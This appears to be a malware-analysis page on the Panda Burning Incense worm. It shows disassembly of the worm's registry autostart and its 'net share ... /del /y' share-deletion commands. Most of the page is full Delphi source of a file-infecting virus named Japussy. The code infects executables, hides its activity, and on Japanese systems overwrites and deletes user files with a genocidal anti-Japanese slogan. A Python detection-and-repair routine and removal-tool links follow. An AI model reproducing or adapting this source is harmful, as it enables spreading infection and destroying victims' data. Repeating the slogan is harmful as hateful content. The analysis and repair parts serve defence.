****************************************************************

*The worm creates its autostart entry by modifying the registry; below is part of what it modifies

****************************************************************
Software\Microsoft\Windows\CurrentVersion\Run
svcshare -> \%system32%\drivers\spoclsv.exe

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D122(C)
|
:0040D124 55 push ebp
:0040D125 8BEC mov ebp, esp
:0040D127 6A00 push 00000000
:0040D129 6A00 push 00000000
:0040D12B 33C0 xor eax, eax
:0040D12D 55 push ebp
:0040D12E 68A9D14000 push 0040D1A9
:0040D133 64FF30 push dword ptr fs:[eax]
:0040D136 648920 mov dword ptr fs:[eax], esp
:0040D139 E8FE9DFFFF call 00406F3C
:0040D13E 8D45F8 lea eax, dword ptr [ebp-08]
:0040D141 E87683FFFF call 004054BC
:0040D146 FF75F8 push [ebp-08]

* Possible StringData Ref from Code Obj ->"drivers\"
|
:0040D149 68BCD14000 push 0040D1BC

* Possible StringData Ref from Code Obj ->"spcolsv.exe"
|
:0040D14E 68D0D14000 push 0040D1D0
:0040D153 8D45FC lea eax, dword ptr [ebp-04]
:0040D156 BA03000000 mov edx, 00000003
:0040D15B E82C6EFFFF call 00403F8C
:0040D160 8B45FC mov eax, dword ptr [ebp-04]
:0040D163 E8646FFFFF call 004040CC
:0040D168 50 push eax

* Possible StringData Ref from Code Obj ->"svcshare"
|
:0040D169 B9DCD14000 mov ecx, 0040D1DC

* Possible StringData Ref from Code Obj ->"Software\Microsoft\Windows\CurrentVersion\Run"
|
:0040D16E BAE8D14000 mov edx, 0040D1E8
:0040D173 B801000080 mov eax, 80000001
:0040D178 E84F81FFFF call 004052CC
:0040D17D 33C9 xor ecx, ecx

* Possible StringData Ref from Code Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Expl"
->"orer\Advanced\Folder\Hidden\SHOWALL\CheckedVal"
->"ue"
|
:0040D17F BA20D24000 mov edx, 0040D220
:0040D184 B802000080 mov eax, 80000002
:0040D189 E87289FFFF call 00405B00
:0040D18E 33C0 xor eax, eax
:0040D190 5A pop edx
:0040D191 59 pop ecx
:0040D192 59 pop ecx
:0040D193 648910 mov dword ptr fs:[eax], edx
:0040D196 68B0D14000 push 0040D1B0
****************************************************************

Hidden shares are deleted by invoking the cmd.exe command interpreter

****************************************************************
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D097(C)
|
:0040D05B 6A00 push 00000000

* Possible StringData Ref from Code Obj ->"cmd.exe /c net share "
|
:0040D05D 68D4D04000 push 0040D0D4
:0040D062 8D45F4 lea eax, dword ptr [ebp-0C]
:0040D065 8B55FC mov edx, dword ptr [ebp-04]
:0040D068 8A541AFF mov dl, byte ptr [edx+ebx-01]
:0040D06C E8BB6DFFFF call 00403E2C
:0040D071 FF75F4 push [ebp-0C]

* Possible StringData Ref from Code Obj ->"$ /del /y"
|
:0040D074 68F4D04000 push 0040D0F4 ; uCmdShow
:0040D079 8D45F8 lea eax, dword ptr [ebp-08]
:0040D07C BA03000000 mov edx, 00000003
:0040D081 E8066FFFFF call 00403F8C
:0040D086 8B45F8 mov eax, dword ptr [ebp-08]
:0040D089 E83E70FFFF call 004040CC
:0040D08E 50 push eax ; lpCmdLine

* Reference To: kernel32.WinExec, Ord:0000h
|
:0040D08F E8407BFFFF Call 00404BD4 ;WinExec
:0040D094 4B dec ebx
:0040D095 85DB test ebx, ebx
:0040D097 75C2 jne 0040D05B

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040D059(C)
|
:0040D099 6A00 push 00000000 ; uCmdShow

* Possible StringData Ref from Code Obj ->"cmd.exe /c net share admin$ /del "
->"/y"
|
:0040D09B 6800D14000 push 0040D100

* Reference To: kernel32.WinExec, Ord:0000h
|
:0040D0A0 E82F7BFFFF Call 00404BD4 ;WinExec
:0040D0A5 33C0 xor eax, eax
:0040D0A7 5A pop edx
:0040D0A8 59 pop ecx
:0040D0A9 59 pop ecx
:0040D0AA 648910 mov dword ptr fs:[eax], edx
:0040D0AD 68C7D04000 push 0040D0C7
****************************************************************

Partial source code of the Panda Burning Incense virus (from CSDN)
//Date:2007-02-01
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //size of the virus body
IconOffset = $12EB8; //offset of the PE file's main icon
//size as built on my Delphi 5 SP1; other Delphi versions may differ
//search for the hex string 2800000020 to find the main icon's offset

{
HeaderSize = 38912; //size of the UPX-compressed virus body
IconOffset = $92BC; //main icon offset in the UPX-compressed PE file
//UPX 1.24W usage: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //size of the PE file's main icon: 744 bytes
IconTail = IconOffset + IconSize; //end of the PE file's main icon
ID = $44444444; //infection marker
//garbage text, to be written into files
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //function declaration
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //flag for a Japanese OS
{ Check whether this is Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ Copy between streams }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ Split the host file out of the infected PE file for use }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //skip the virus part at the head
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ Fill the STARTUPINFO structure }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ Send infected mail }
procedure SendMail;
begin
//anyone willing to finish this?
end;
{ Infect a PE file }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //on error the file is in use, so exit
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //don't infect itself
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //check the PE file header
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE signature
begin
IsPE := True; //it is a PE file
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //check the infection marker
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then //don't infect files that are too small
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //exit if already infected or not a PE file
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//get the target file's main icon (744 bytes) and store it in a stream
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//header file (the virus body)
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//write the data preceding the virus body's main icon
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//write the current program's main icon
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//write the data between the virus body's main icon and its end
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//write the host program
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//write the infected marker
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //replace the host file
DstStream.Free;
end;
except;
end;
end;
{ Write garbage into the target file, then delete it }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //remove the read-only attribute
FileHandle := FileOpen(FileName, fmOpenWrite); //open the file
try
Size := GetFileSize(FileHandle, nil); //file size
i := 0;
Randomize;
Max := Random(15); //random number of garbage writes
if Max < 5 then
Max := 5;
Mass := Size div Max; //size of each interval block
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //seek
//write garbage to destroy the file completely
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //close the file
end;
DeleteFile(PChar(FileName)); //delete it
except
end;
end;
{ Get the list of writable drives }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //iterate over the 26 letters
begin
D := Chr(i + 65);
Str := D + ':\';
DiskType := GetDriveType(PChar(Str));
//local disks and network drives
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ Walk directories, infecting and destroying files }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //not a directory
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 //not the root directory
else Result := 2; //is the root directory
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //pump the message queue to avoid arousing suspicion
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //infect executable files
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//infect HTML and ASP files by writing in the Base64-encoded virus
//infects every user who browses the page
//anyone willing to finish this?
end
else if Ext = '.WAB' then //Outlook address book file
begin
//collect Outlook e-mail addresses
end
else if Ext = '.ADC' then //Foxmail address auto-complete file
begin
//collect Foxmail e-mail addresses
end
else if Ext = 'IND' then //Foxmail address book file
begin
//collect Foxmail e-mail addresses
end
else
begin
if IsJap then //Japanese OS
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //destroy the file
end;
end;
end;
//sleep 200 ms after infecting or deleting a file so high CPU use does not arouse suspicion
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings[i] + '\', Mask);
FreeAndNil(SubDir);
end;
{ Walk every file on the disks }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //Japanese OS
IsJap := True; //go to hell!
DriverList := GetDrives; //get the list of writable disks
Len := Length(DriverList);
while True do //infinite loop
begin
for i := Len downto 1 do //iterate over each drive
LoopFiles(DriverList[i] + ':\', '*.*'); //infect it
SendMail; //send infected mail
Sleep(1000 * 60 * 5); //sleep 5 minutes
end;
end;
{ Main program }
begin
if IsWin9x then //Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //register as a service process
else //WinNT
begin
//map a remote thread into the Explorer process
//anyone willing to finish this?
end;
//if this is the original virus body itself
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //infect and send mail
else //already parasitic on a host program; start working
begin
TmpFile := ParamStr(0); //create a temporary file
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //the real host file, with an extra space
ExtractFile(TmpFile); //split it out
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //create a new process to run it
InfectFiles; //infect and send mail
end;
end.
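A defender-side check and repair routine for the file layout InfectOneFile produces (virus body, then the host program, then the 4-byte ID marker). This is an added Python example, not code from the page or from the virus author; the header size is a parameter because the page's value (82432) holds only for that build, and the MZ/PE-based host locator and the sample bytes are constructed assumptions.

```python
import struct
from typing import Optional

INFECTION_MARK = struct.pack("<I", 0x44444444)  # trailing ID the worm writes (b"DDDD")


def is_marked_infected(data: bytes) -> bool:
    """True if the last 4 bytes are the worm's infection marker."""
    return len(data) >= 4 and data[-4:] == INFECTION_MARK


def find_host_offset(data: bytes) -> int:
    """Offset of the embedded host PE, or -1 when none is found.

    The worm prepends its own image, so the host is the first MZ stub after
    offset 0 whose e_lfanew points at a valid 'PE\\0\\0' signature (heuristic).
    """
    pos = data.find(b"MZ", 1)
    while pos != -1 and pos + 0x40 <= len(data):
        e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
        if data[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\x00\x00":
            return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def recover_host(data: bytes, header_size: Optional[int] = None) -> bytes:
    """Return the original host: drop the prepended worm body and the trailing marker.

    Pass header_size when the sample's HeaderSize is known (82432 in the build
    above); otherwise the host is located heuristically via find_host_offset.
    """
    if not is_marked_infected(data):
        raise ValueError("no infection marker; nothing to repair")
    start = header_size if header_size is not None else find_host_offset(data)
    if start <= 0 or start >= len(data) - 4 or data[start:start + 2] != b"MZ":
        raise ValueError("could not locate the embedded host")
    return data[start:-4]


def fake_pe(size: int, tag: bytes) -> bytes:
    """Constructed stand-in for a PE image: MZ header, e_lfanew=0x40, PE signature, padding."""
    hdr = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00"
    return hdr + tag * (size - len(hdr))


# Constructed sample in the layout InfectOneFile produces: worm body + host + ID.
WORM_BODY = fake_pe(1024, b"V")
HOST = fake_pe(512, b"H")
INFECTED = WORM_BODY + HOST + INFECTION_MARK
```

Unlike the page's ExtractFile, which copies everything from HeaderSize to the end and therefore leaves the 4-byte marker appended to the extracted host, recover_host strips it so the repaired file matches the original.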

E. Solutions

Rising dedicated Panda Burning Incense removal tool
http://shadu.baidu.com/zhuansha/downloadZS.jsp?id=140

Kingsoft Duba dedicated Panda Burning Incense removal tool
http://shadu.baidu.com/zhuansha/downloadZS.jsp?id=134

==============EOF=====================================================